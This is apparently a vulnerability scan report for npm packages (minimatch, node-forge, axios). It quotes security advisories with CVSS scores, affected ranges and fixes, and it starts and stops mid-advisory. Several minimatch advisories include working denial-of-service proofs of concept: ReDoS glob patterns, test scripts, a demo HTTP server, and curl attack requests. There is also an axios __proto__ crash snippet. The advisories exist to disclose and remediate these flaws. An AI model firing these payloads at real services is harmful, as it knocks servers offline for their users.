These are textbook nested-quantifier patterns. Against an input of repeated a characters followed by a non-matching character z, V8's backtracking engine explores an exponential number of paths before returning false.

The generated regex is stored on this.set and evaluated inside matchOne() at src/index.ts#L1010 via p.test(f). It is reached through the standard minimatch() call with no configuration.

Measured times via minimatch():

Pattern Input Time
*(*(a|b)) a x30 + z ~68,000ms
*(*(*(a|b))) a x20 + z ~124,000ms
*(*(*(*(a|b)))) a x25 + z ~116,000ms
*(a|a) a x25 + z ~2,000ms

Depth inflection at fixed input a x16 + z:

Depth Pattern Time
1 *(a|b) 0ms
2 *(*(a|b)) 4ms
3 *(*(*(a|b))) 270ms
4 *(*(*(*(a|b)))) 115,000ms

Going from depth 2 to depth 3 with a 20-character input jumps from 66ms to 123,544ms -- a 1,867x increase from a single added nesting level.


PoC

Tested on minimatch@10.2.2, Node.js 20.

Step 1 -- verify the generated regexps and timing (standalone script)

Save as poc4-validate.mjs and run with node poc4-validate.mjs:

import { minimatch, Minimatch } from 'minimatch'

function timed(fn) {
  const s = process.hrtime.bigint()
  let result, error
  try { result = fn() } catch(e) { error = e }
  const ms = Number(process.hrtime.bigint() - s) / 1e6
  return { ms, result, error }
}

// Verify generated regexps
for (let depth = 1; depth <= 4; depth++) {
  let pat = 'a|b'
  for (let i = 0; i < depth; i++) pat = `*(${pat})`
  const re = new Minimatch(pat, {}).set?.[0]?.[0]?.toString()
  console.log(`depth=${depth} "${pat}" -> ${re}`)
}
// depth=1 "*(a|b)"          -> /^(?:a|b)*$/
// depth=2 "*(*(a|b))"       -> /^(?:(?:a|b)*)*$/
// depth=3 "*(*(*(a|b)))"    -> /^(?:(?:(?:a|b)*)*)*$/
// depth=4 "*(*(*(*(a|b))))" -> /^(?:(?:(?:(?:a|b)*)*)*)*$/

// Safe-length timing (exponential growth confirmation without multi-minute hang)
const cases = [
  ['*(*(*(a|b)))', 15],   // ~270ms
  ['*(*(*(a|b)))', 17],   // ~800ms
  ['*(*(*(a|b)))', 19],   // ~2400ms
  ['*(*(a|b))',    23],   // ~260ms
  ['*(a|b)',      101],   // <5ms (depth=1 control)
]
for (const [pat, n] of cases) {
  const t = timed(() => minimatch('a'.repeat(n) + 'z', pat))
  console.log(`"${pat}" n=${n}: ${t.ms.toFixed(0)}ms result=${t.result}`)
}

// Confirm noext disables the vulnerability
const t_noext = timed(() => minimatch('a'.repeat(18) + 'z', '*(*(*(a|b)))', { noext: true }))
console.log(`noext=true: ${t_noext.ms.toFixed(0)}ms (should be ~0ms)`)

// +() is equally affected
const t_plus = timed(() => minimatch('a'.repeat(17) + 'z', '+(+(+(a|b)))'))
console.log(`"+(+(+(a|b)))" n=18: ${t_plus.ms.toFixed(0)}ms result=${t_plus.result}`)

Observed output:

depth=1 "*(a|b)"          -> /^(?:a|b)*$/
depth=2 "*(*(a|b))"       -> /^(?:(?:a|b)*)*$/
depth=3 "*(*(*(a|b)))"    -> /^(?:(?:(?:a|b)*)*)*$/
depth=4 "*(*(*(*(a|b))))" -> /^(?:(?:(?:(?:a|b)*)*)*)*$/
"*(*(*(a|b)))" n=15: 269ms result=false
"*(*(*(a|b)))" n=17: 268ms result=false
"*(*(*(a|b)))" n=19: 2408ms result=false
"*(*(a|b))"    n=23: 257ms result=false
"*(a|b)"       n=101: 0ms result=false
noext=true: 0ms (should be ~0ms)
"+(+(+(a|b)))" n=18: 6300ms result=false

Step 2 -- HTTP server (event loop starvation proof)

Save as poc4-server.mjs:

import http from 'node:http'
import { URL } from 'node:url'
import { minimatch } from 'minimatch'

const PORT = 3001
http.createServer((req, res) => {
  const url     = new URL(req.url, `http://localhost:${PORT}`)
  const pattern = url.searchParams.get('pattern') ?? ''
  const path    = url.searchParams.get('path') ?? ''

  const start  = process.hrtime.bigint()
  const result = minimatch(path, pattern)
  const ms     = Number(process.hrtime.bigint() - start) / 1e6

  console.log(`[${new Date().toISOString()}] ${ms.toFixed(0)}ms pattern="${pattern}" path="${path.slice(0,30)}"`)
  res.writeHead(200, { 'Content-Type': 'application/json' })
  res.end(JSON.stringify({ result, ms: ms.toFixed(0) }) + '\n')
}).listen(PORT, () => console.log(`listening on ${PORT}`))

Terminal 1 -- start the server:

node poc4-server.mjs

Terminal 2 -- fire the attack (depth=3, 19 a's + z) and return immediately:

curl "http://localhost:3001/match?pattern=*%28*%28*%28a%7Cb%29%29%29&path=aaaaaaaaaaaaaaaaaaaz" &

Terminal 3 -- send a benign request while the attack is in-flight:

curl -w "\ntime_total: %{time_total}s\n" "http://localhost:3001/match?pattern=*%28a%7Cb%29&path=aaaz"

Observed output -- Terminal 2 (attack):

{"result":false,"ms":"64149"}

Observed output -- Terminal 3 (benign, concurrent):

{"result":false,"ms":"0"}

time_total: 63.022047s

Terminal 1 (server log):

[2026-02-20T09:41:17.624Z] pattern="*(*(*(a|b)))" path="aaaaaaaaaaaaaaaaaaaz"
[2026-02-20T09:42:21.775Z] done in 64149ms result=false
[2026-02-20T09:42:21.779Z] pattern="*(a|b)" path="aaaz"
[2026-02-20T09:42:21.779Z] done in 0ms result=false

The server reports "ms":"0" for the benign request -- the legitimate request itself requires no CPU time. The entire 63-second time_total is time spent waiting for the event loop to be released. The benign request was only dispatched after the attack completed, confirmed by the server log timestamps.

Note: standalone script timing (~7s at n=19) is lower than server timing (64s) because the standalone script had warmed up V8's JIT through earlier sequential calls. A cold server hits the worst case. Both measurements confirm catastrophic backtracking -- the server result is the more realistic figure for production impact.


Impact

Any context where an attacker can influence the glob pattern passed to minimatch() is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments, multi-tenant platforms where users configure glob-based rules (file filters, ignore lists, include patterns), and CI/CD pipelines that evaluate user-submitted config files containing glob expressions. No evidence was found of production HTTP servers passing raw user input directly as the extglob pattern, so that framing is not claimed here.

Depth 3 (*(*(*(a|b))), 12 bytes) stalls the Node.js event loop for 7+ seconds with an 18-character input. Depth 2 (*(*(a|b)), 9 bytes) reaches 68 seconds with a 31-character input. Both the pattern and the input fit in a query string or JSON body without triggering the 64 KB length guard.

+() extglobs share the same code path and produce equivalent worst-case behavior (6.3 seconds at depth=3 with an 18-character input, confirmed).

Mitigation available: passing { noext: true } to minimatch() disables extglob processing entirely and reduces the same input to 0ms. Applications that do not need extglob syntax should set this option when handling untrusted patterns.

high 7.5: CVE--2026--27903 Inefficient Algorithmic Complexity

Affected range>=10.0.0
<10.2.3
Fixed version10.2.3
CVSS Score7.5
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score0.054%
EPSS Percentile16th percentile
Description

Summary

matchOne() performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent ** (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where n is the number of path segments and k is the number of globstars. With k=11 and n=30, a call to the default minimatch() API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior.


Details

The vulnerable loop is in matchOne() at src/index.ts#L960:

while (fr < fl) {
  ..
  if (this.matchOne(file.slice(fr), pattern.slice(pr), partial)) {
    ..
    return true
  }
  ..
  fr++
}

When a GLOBSTAR is encountered, the function tries to match the remaining pattern against every suffix of the remaining file segments. Each ** multiplies the number of recursive calls by the number of remaining segments. With k non-adjacent globstars and n file segments, the total number of calls is C(n, k).

There is no depth counter, visited-state cache, or budget limit applied to this recursion. The call tree is fully explored before returning false on a non-matching input.

Measured timing with n=30 path segments:

k (globstars) Pattern size Time
7 36 bytes ~154ms
9 46 bytes ~1.2s
11 56 bytes ~5.4s
12 61 bytes ~9.7s
13 66 bytes ~15.9s

PoC

Tested on minimatch@10.2.2, Node.js 20.

Step 1 -- inline script

import { minimatch } from 'minimatch'

// k=9 globstars, n=30 path segments
// pattern: 46 bytes, default options
const pattern = '**/a/**/a/**/a/**/a/**/a/**/a/**/a/**/a/**/a/b'
const path    = 'a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a'

const start = Date.now()
minimatch(path, pattern)
console.log(Date.now() - start + 'ms') // ~1200ms

To scale the effect, increase k:

// k=11 -> ~5.4s, k=13 -> ~15.9s
const k = 11
const pattern = Array.from({ length: k }, () => '**/a').join('/') + '/b'
const path    = Array(30).fill('a').join('/')
minimatch(path, pattern)

No special options are required. This reproduces with the default minimatch() call.

Step 2 -- HTTP server (event loop starvation proof)

The following server demonstrates the event loop starvation effect. It is a minimal harness, not a claim that this exact deployment pattern is common:

// poc1-server.mjs
import http from 'node:http'
import { URL } from 'node:url'
import { minimatch } from 'minimatch'

const PORT = 3000

const server = http.createServer((req, res) => {
  const url = new URL(req.url, `http://localhost:${PORT}`)
  if (url.pathname !== '/match') { res.writeHead(404); res.end(); return }

  const pattern = url.searchParams.get('pattern') ?? ''
  const path    = url.searchParams.get('path') ?? ''

  const start  = process.hrtime.bigint()
  const result = minimatch(path, pattern)
  const ms     = Number(process.hrtime.bigint() - start) / 1e6

  res.writeHead(200, { 'Content-Type': 'application/json' })
  res.end(JSON.stringify({ result, ms: ms.toFixed(0) }) + '\n')
})

server.listen(PORT)

Terminal 1 -- start the server:

node poc1-server.mjs

Terminal 2 -- send the attack request (k=11, ~5s stall) and immediately return to shell:

curl "http://localhost:3000/match?pattern=**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2Fb&path=a%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa" &

Terminal 3 -- while the attack is in-flight, send a benign request:

curl -w "\ntime_total: %{time_total}s\n" "http://localhost:3000/match?pattern=**%2Fy%2Fz&path=x%2Fy%2Fz"

Observed output (Terminal 3):

{"result":true,"ms":"0"}

time_total: 4.132709s

The server reports "ms":"0" -- the legitimate request itself takes zero processing time. The 4+ second time_total is entirely time spent waiting for the event loop to be released by the attack request. Every concurrent user is blocked for the full duration of each attack call. Repeating the benign request while no attack is in-flight confirms the baseline:

{"result":true,"ms":"0"}

time_total: 0.001599s

Impact

Any application where an attacker can influence the glob pattern passed to minimatch() is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature.

critical: 0 high: 3 medium: 0 low: 0 minimatch 9.0.5 (npm)

pkg:npm/minimatch@9.0.5

high 8.7: CVE--2026--26996 Inefficient Regular Expression Complexity

Affected range>=9.0.0
<9.0.6
Fixed version10.2.1
CVSS Score8.7
CVSS VectorCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
EPSS Score0.052%
EPSS Percentile16th percentile
Description

Summary

minimatch is vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive * wildcards followed by a literal character that doesn't appear in the test string. Each * compiles to a separate [^/]*? regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits.

The time complexity is O(4^N) where N is the number of * characters. With N=15, a single minimatch() call takes ~2 seconds. With N=34, it hangs effectively forever.

Details

Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer.

PoC

When minimatch compiles a glob pattern, each * becomes [^/]*? in the generated regex. For a pattern like ***************X***:

/^(?!\.)[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?X[^/]*?[^/]*?[^/]*?$/

When the test string doesn't contain X, the regex engine must try every possible way to distribute the characters across all the [^/]*? groups before concluding no match exists. With N groups and M characters, this is O(C(N+M, N)) — exponential.

Impact

Any application that passes user-controlled strings to minimatch() as the pattern argument is vulnerable to DoS. This includes:

  • File search/filter UIs that accept glob patterns
  • .gitignore-style filtering with user-defined rules
  • Build tools that accept glob configuration
  • Any API that exposes glob matching to untrusted input

Thanks to @ljharb for back-porting the fix to legacy versions of minimatch.

high 7.5: CVE--2026--27904 Inefficient Regular Expression Complexity

Affected range>=9.0.0
<9.0.7
Fixed version9.0.7
CVSS Score7.5
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score0.052%
EPSS Percentile16th percentile
Description

Summary

Nested *() extglobs produce regexps with nested unbounded quantifiers (e.g. (?:(?:a|b)*)*), which exhibit catastrophic backtracking in V8. With a 12-byte pattern *(*(*(a|b))) and an 18-byte non-matching input, minimatch() stalls for over 7 seconds. Adding a single nesting level or a few input characters pushes this to minutes. This is the most severe finding: it is triggered by the default minimatch() API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects +() extglobs equally.


Details

The root cause is in AST.toRegExpSource() at src/ast.ts#L598. For the * extglob type, the close token emitted is )* or )?, wrapping the recursive body in (?:...)*. When extglobs are nested, each level adds another * quantifier around the previous group:

: this.type === '*' && bodyDotAllowed ? `)?`
: `)${this.type}`

This produces the following regexps:

Pattern Generated regex
*(a|b) /^(?:a|b)*$/
*(*(a|b)) /^(?:(?:a|b)*)*$/
*(*(*(a|b))) /^(?:(?:(?:a|b)*)*)*$/
*(*(*(*(a|b)))) /^(?:(?:(?:(?:a|b)*)*)*)*$/

These are textbook nested-quantifier patterns. Against an input of repeated a characters followed by a non-matching character z, V8's backtracking engine explores an exponential number of paths before returning false.

The generated regex is stored on this.set and evaluated inside matchOne() at src/index.ts#L1010 via p.test(f). It is reached through the standard minimatch() call with no configuration.

Measured times via minimatch():

Pattern Input Time
*(*(a|b)) a x30 + z ~68,000ms
*(*(*(a|b))) a x20 + z ~124,000ms
*(*(*(*(a|b)))) a x25 + z ~116,000ms
*(a|a) a x25 + z ~2,000ms

Depth inflection at fixed input a x16 + z:

Depth Pattern Time
1 *(a|b) 0ms
2 *(*(a|b)) 4ms
3 *(*(*(a|b))) 270ms
4 *(*(*(*(a|b)))) 115,000ms

Going from depth 2 to depth 3 with a 20-character input jumps from 66ms to 123,544ms -- a 1,867x increase from a single added nesting level.


PoC

Tested on minimatch@10.2.2, Node.js 20.

Step 1 -- verify the generated regexps and timing (standalone script)

Save as poc4-validate.mjs and run with node poc4-validate.mjs:

import { minimatch, Minimatch } from 'minimatch'

function timed(fn) {
  const s = process.hrtime.bigint()
  let result, error
  try { result = fn() } catch(e) { error = e }
  const ms = Number(process.hrtime.bigint() - s) / 1e6
  return { ms, result, error }
}

// Verify generated regexps
for (let depth = 1; depth <= 4; depth++) {
  let pat = 'a|b'
  for (let i = 0; i < depth; i++) pat = `*(${pat})`
  const re = new Minimatch(pat, {}).set?.[0]?.[0]?.toString()
  console.log(`depth=${depth} "${pat}" -> ${re}`)
}
// depth=1 "*(a|b)"          -> /^(?:a|b)*$/
// depth=2 "*(*(a|b))"       -> /^(?:(?:a|b)*)*$/
// depth=3 "*(*(*(a|b)))"    -> /^(?:(?:(?:a|b)*)*)*$/
// depth=4 "*(*(*(*(a|b))))" -> /^(?:(?:(?:(?:a|b)*)*)*)*$/

// Safe-length timing (exponential growth confirmation without multi-minute hang)
const cases = [
  ['*(*(*(a|b)))', 15],   // ~270ms
  ['*(*(*(a|b)))', 17],   // ~800ms
  ['*(*(*(a|b)))', 19],   // ~2400ms
  ['*(*(a|b))',    23],   // ~260ms
  ['*(a|b)',      101],   // <5ms (depth=1 control)
]
for (const [pat, n] of cases) {
  const t = timed(() => minimatch('a'.repeat(n) + 'z', pat))
  console.log(`"${pat}" n=${n}: ${t.ms.toFixed(0)}ms result=${t.result}`)
}

// Confirm noext disables the vulnerability
const t_noext = timed(() => minimatch('a'.repeat(18) + 'z', '*(*(*(a|b)))', { noext: true }))
console.log(`noext=true: ${t_noext.ms.toFixed(0)}ms (should be ~0ms)`)

// +() is equally affected
const t_plus = timed(() => minimatch('a'.repeat(17) + 'z', '+(+(+(a|b)))'))
console.log(`"+(+(+(a|b)))" n=18: ${t_plus.ms.toFixed(0)}ms result=${t_plus.result}`)

Observed output:

depth=1 "*(a|b)"          -> /^(?:a|b)*$/
depth=2 "*(*(a|b))"       -> /^(?:(?:a|b)*)*$/
depth=3 "*(*(*(a|b)))"    -> /^(?:(?:(?:a|b)*)*)*$/
depth=4 "*(*(*(*(a|b))))" -> /^(?:(?:(?:(?:a|b)*)*)*)*$/
"*(*(*(a|b)))" n=15: 269ms result=false
"*(*(*(a|b)))" n=17: 268ms result=false
"*(*(*(a|b)))" n=19: 2408ms result=false
"*(*(a|b))"    n=23: 257ms result=false
"*(a|b)"       n=101: 0ms result=false
noext=true: 0ms (should be ~0ms)
"+(+(+(a|b)))" n=18: 6300ms result=false

Step 2 -- HTTP server (event loop starvation proof)

Save as poc4-server.mjs:

import http from 'node:http'
import { URL } from 'node:url'
import { minimatch } from 'minimatch'

const PORT = 3001
http.createServer((req, res) => {
  const url     = new URL(req.url, `http://localhost:${PORT}`)
  const pattern = url.searchParams.get('pattern') ?? ''
  const path    = url.searchParams.get('path') ?? ''

  const start  = process.hrtime.bigint()
  const result = minimatch(path, pattern)
  const ms     = Number(process.hrtime.bigint() - start) / 1e6

  console.log(`[${new Date().toISOString()}] ${ms.toFixed(0)}ms pattern="${pattern}" path="${path.slice(0,30)}"`)
  res.writeHead(200, { 'Content-Type': 'application/json' })
  res.end(JSON.stringify({ result, ms: ms.toFixed(0) }) + '\n')
}).listen(PORT, () => console.log(`listening on ${PORT}`))

Terminal 1 -- start the server:

node poc4-server.mjs

Terminal 2 -- fire the attack (depth=3, 19 a's + z) and return immediately:

curl "http://localhost:3001/match?pattern=*%28*%28*%28a%7Cb%29%29%29&path=aaaaaaaaaaaaaaaaaaaz" &

Terminal 3 -- send a benign request while the attack is in-flight:

curl -w "\ntime_total: %{time_total}s\n" "http://localhost:3001/match?pattern=*%28a%7Cb%29&path=aaaz"

Observed output -- Terminal 2 (attack):

{"result":false,"ms":"64149"}

Observed output -- Terminal 3 (benign, concurrent):

{"result":false,"ms":"0"}

time_total: 63.022047s

Terminal 1 (server log):

[2026-02-20T09:41:17.624Z] pattern="*(*(*(a|b)))" path="aaaaaaaaaaaaaaaaaaaz"
[2026-02-20T09:42:21.775Z] done in 64149ms result=false
[2026-02-20T09:42:21.779Z] pattern="*(a|b)" path="aaaz"
[2026-02-20T09:42:21.779Z] done in 0ms result=false

The server reports "ms":"0" for the benign request -- the legitimate request itself requires no CPU time. The entire 63-second time_total is time spent waiting for the event loop to be released. The benign request was only dispatched after the attack completed, confirmed by the server log timestamps.

Note: standalone script timing (~7s at n=19) is lower than server timing (64s) because the standalone script had warmed up V8's JIT through earlier sequential calls. A cold server hits the worst case. Both measurements confirm catastrophic backtracking -- the server result is the more realistic figure for production impact.


Impact

Any context where an attacker can influence the glob pattern passed to minimatch() is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments, multi-tenant platforms where users configure glob-based rules (file filters, ignore lists, include patterns), and CI/CD pipelines that evaluate user-submitted config files containing glob expressions. No evidence was found of production HTTP servers passing raw user input directly as the extglob pattern, so that framing is not claimed here.

Depth 3 (*(*(*(a|b))), 12 bytes) stalls the Node.js event loop for 7+ seconds with an 18-character input. Depth 2 (*(*(a|b)), 9 bytes) reaches 68 seconds with a 31-character input. Both the pattern and the input fit in a query string or JSON body without triggering the 64 KB length guard.

+() extglobs share the same code path and produce equivalent worst-case behavior (6.3 seconds at depth=3 with an 18-character input, confirmed).

Mitigation available: passing { noext: true } to minimatch() disables extglob processing entirely and reduces the same input to 0ms. Applications that do not need extglob syntax should set this option when handling untrusted patterns.

high 7.5: CVE--2026--27903 Inefficient Algorithmic Complexity

Affected range>=9.0.0
<9.0.7
Fixed version9.0.7
CVSS Score7.5
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score0.054%
EPSS Percentile16th percentile
Description

Summary

matchOne() performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent ** (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where n is the number of path segments and k is the number of globstars. With k=11 and n=30, a call to the default minimatch() API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior.


Details

The vulnerable loop is in matchOne() at src/index.ts#L960:

while (fr < fl) {
  ..
  if (this.matchOne(file.slice(fr), pattern.slice(pr), partial)) {
    ..
    return true
  }
  ..
  fr++
}

When a GLOBSTAR is encountered, the function tries to match the remaining pattern against every suffix of the remaining file segments. Each ** multiplies the number of recursive calls by the number of remaining segments. With k non-adjacent globstars and n file segments, the total number of calls is C(n, k).

There is no depth counter, visited-state cache, or budget limit applied to this recursion. The call tree is fully explored before returning false on a non-matching input.

Measured timing with n=30 path segments:

k (globstars) Pattern size Time
7 36 bytes ~154ms
9 46 bytes ~1.2s
11 56 bytes ~5.4s
12 61 bytes ~9.7s
13 66 bytes ~15.9s

PoC

Tested on minimatch@10.2.2, Node.js 20.

Step 1 -- inline script

import { minimatch } from 'minimatch'

// k=9 globstars, n=30 path segments
// pattern: 46 bytes, default options
const pattern = '**/a/**/a/**/a/**/a/**/a/**/a/**/a/**/a/**/a/b'
const path    = 'a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a'

const start = Date.now()
minimatch(path, pattern)
console.log(Date.now() - start + 'ms') // ~1200ms

To scale the effect, increase k:

// k=11 -> ~5.4s, k=13 -> ~15.9s
const k = 11
const pattern = Array.from({ length: k }, () => '**/a').join('/') + '/b'
const path    = Array(30).fill('a').join('/')
minimatch(path, pattern)

No special options are required. This reproduces with the default minimatch() call.

Step 2 -- HTTP server (event loop starvation proof)

The following server demonstrates the event loop starvation effect. It is a minimal harness, not a claim that this exact deployment pattern is common:

// poc1-server.mjs
import http from 'node:http'
import { URL } from 'node:url'
import { minimatch } from 'minimatch'

const PORT = 3000

const server = http.createServer((req, res) => {
  const url = new URL(req.url, `http://localhost:${PORT}`)
  if (url.pathname !== '/match') { res.writeHead(404); res.end(); return }

  const pattern = url.searchParams.get('pattern') ?? ''
  const path    = url.searchParams.get('path') ?? ''

  const start  = process.hrtime.bigint()
  const result = minimatch(path, pattern)
  const ms     = Number(process.hrtime.bigint() - start) / 1e6

  res.writeHead(200, { 'Content-Type': 'application/json' })
  res.end(JSON.stringify({ result, ms: ms.toFixed(0) }) + '\n')
})

server.listen(PORT)

Terminal 1 -- start the server:

node poc1-server.mjs

Terminal 2 -- send the attack request (k=11, ~5s stall) and immediately return to shell:

curl "http://localhost:3000/match?pattern=**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2Fb&path=a%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa" &

Terminal 3 -- while the attack is in-flight, send a benign request:

curl -w "\ntime_total: %{time_total}s\n" "http://localhost:3000/match?pattern=**%2Fy%2Fz&path=x%2Fy%2Fz"

Observed output (Terminal 3):

{"result":true,"ms":"0"}

time_total: 4.132709s

The server reports "ms":"0" -- the legitimate request itself takes zero processing time. The 4+ second time_total is entirely time spent waiting for the event loop to be released by the attack request. Every concurrent user is blocked for the full duration of each attack call. Repeating the benign request while no attack is in-flight confirms the baseline:

{"result":true,"ms":"0"}

time_total: 0.001599s

Impact

Any application where an attacker can influence the glob pattern passed to minimatch() is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature.

critical: 0 high: 2 medium: 0 low: 0 node-forge 1.3.1 (npm)

pkg:npm/node-forge@1.3.1

high 8.7: CVE--2025--66031 Uncontrolled Recursion

Affected range<1.3.2
Fixed version1.3.2
CVSS Score8.7
CVSS VectorCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
EPSS Score0.115%
EPSS Percentile30th percentile
Description

Summary

An Uncontrolled Recursion (CWE-674) vulnerability in node-forge versions 1.3.1 and below enables remote, unauthenticated attackers to craft deep ASN.1 structures that trigger unbounded recursive parsing. This leads to a Denial-of-Service (DoS) via stack exhaustion when parsing untrusted DER inputs.

Details

An ASN.1 Denial of Service (Dos) vulnerability exists in the node-forge asn1.fromDer function within forge/lib/asn1.js. The ASN.1 DER parser implementation (_fromDer) recurses for every constructed ASN.1 value (SEQUENCE, SET, etc.) and lacks a guard limiting recursion depth. An attacker can craft a small DER blob containing a very large nesting depth of constructed TLVs which causes the Node.js V8 engine to exhaust its call stack and throw RangeError: Maximum call stack size exceeded, crashing or incapacitating the process handling the parse. This is a remote, low-cost Denial-of-Service against applications that parse untrusted ASN.1 objects.

Impact

This vulnerability enables an unauthenticated attacker to reliably crash a server or client using node-forge for TLS connections or certificate parsing.

This vulnerability impacts the ans1.fromDer function in node-forge before patched version 1.3.2.

Any downstream application using this component is impacted. These components may be leveraged by downstream applications in ways that enable full compromise of availability.

high 8.7: CVE--2025--12816 Interpretation Conflict

Affected range<1.3.2
Fixed version1.3.2
CVSS Score8.7
CVSS VectorCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N
EPSS Score0.059%
EPSS Percentile18th percentile
Description

Summary

CVE-2025-12816 has been reserved by CERT/CC

Description
An Interpretation Conflict (CWE-436) vulnerability in node-forge versions 1.3.1 and below enables remote, unauthenticated attackers to craft ASN.1 structures to desynchronize schema validations, yielding a semantic divergence that may bypass downstream cryptographic verifications and security decisions.

Details

A critical ASN.1 validation bypass vulnerability exists in the node-forge asn1.validate function within forge/lib/asn1.js. ASN.1 is a schema language that defines data structures, like the typed record schemas used in X.509, PKCS#7, PKCS#12, etc. DER (Distinguished Encoding Rules), a strict binary encoding of ASN.1, is what cryptographic code expects when verifying signatures, and the exact bytes and structure must match the schema used to compute and verify the signature. After deserializing DER, Forge uses static ASN.1 validation schemas to locate the signed data or public key, compute digests over the exact bytes required, and feed digest and signature fields into cryptographic primitives.

This vulnerability allows a specially crafted ASN.1 object to desynchronize the validator on optional boundaries, causing a malformed optional field to be semantically reinterpreted as the subsequent mandatory structure. This manifests as logic bypasses in cryptographic algorithms and protocols with optional security features (such as PKCS#12, where MACs are treated as absent) and semantic interpretation conflicts in strict protocols (such as X.509, where fields are read as the wrong type).

Impact

This flaw allows an attacker to desynchronize the validator, allowing critical components like digital signatures or integrity checks to be skipped or validated against attacker-controlled data.

This vulnerability impacts the ans1.validate function in node-forge before patched version 1.3.2.
https://github.com/digitalbazaar/forge/blob/main/lib/asn1.js.

The following components in node-forge are impacted.
lib/asn1.js
lib/x509.js
lib/pkcs12.js
lib/pkcs7.js
lib/rsa.js
lib/pbe.js
lib/ed25519.js

Any downstream application using these components is impacted.

These components may be leveraged by downstream applications in ways that enable full compromise of integrity, leading to potential availability and confidentiality compromises.

critical: 0 high: 2 medium: 0 low: 0 axios 1.8.4 (npm)

pkg:npm/axios@1.8.4

high 7.5: CVE--2026--25639 Improper Check for Unusual or Exceptional Conditions

Affected range>=1.0.0
<=1.13.4
Fixed version1.13.5
CVSS Score7.5
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score0.036%
EPSS Percentile10th percentile
Description

Denial of Service via proto Key in mergeConfig

Summary

The mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.

Details

The vulnerability exists in lib/core/mergeConfig.js at lines 98-101:

utils.forEach(Object.keys({ ...config1, ...config2 }), function computeConfigValue(prop) {
  const merge = mergeMap[prop] || mergeDeepProperties;
  const configValue = merge(config1[prop], config2[prop], prop);
  (utils.isUndefined(configValue) && merge !== mergeDirectKeys) || (config[prop] = configValue);
});

When prop is '__proto__':

  1. JSON.parse('{"__proto__": {...}}') creates an object with __proto__ as an own enumerable property
  2. Object.keys() includes '__proto__' in the iteration
  3. mergeMap['__proto__'] performs prototype chain lookup, returning Object.prototype (truthy object)
  4. The expression mergeMap[prop] || mergeDeepProperties evaluates to Object.prototype
  5. Object.prototype(...) throws TypeError: merge is not a function

The mergeConfig function is called by:

  • Axios._request() at lib/core/Axios.js:75
  • Axios.getUri() at lib/core/Axios.js:201
  • All HTTP method shortcuts (get, post, etc.) at lib/core/Axios.js:211,224

PoC

import axios from "axios";

const maliciousConfig = JSON.parse('{"__proto__": {"x": 1}}');
await axios.get("https://httpbin.org/get", maliciousConfig);

Reproduction steps:

  1. Clone axios repository or npm install axios
  2. Create file poc.mjs with the code above
  3. Run: node poc.mjs
  4. Observe the TypeError crash

Verified output (axios 1.13.4):
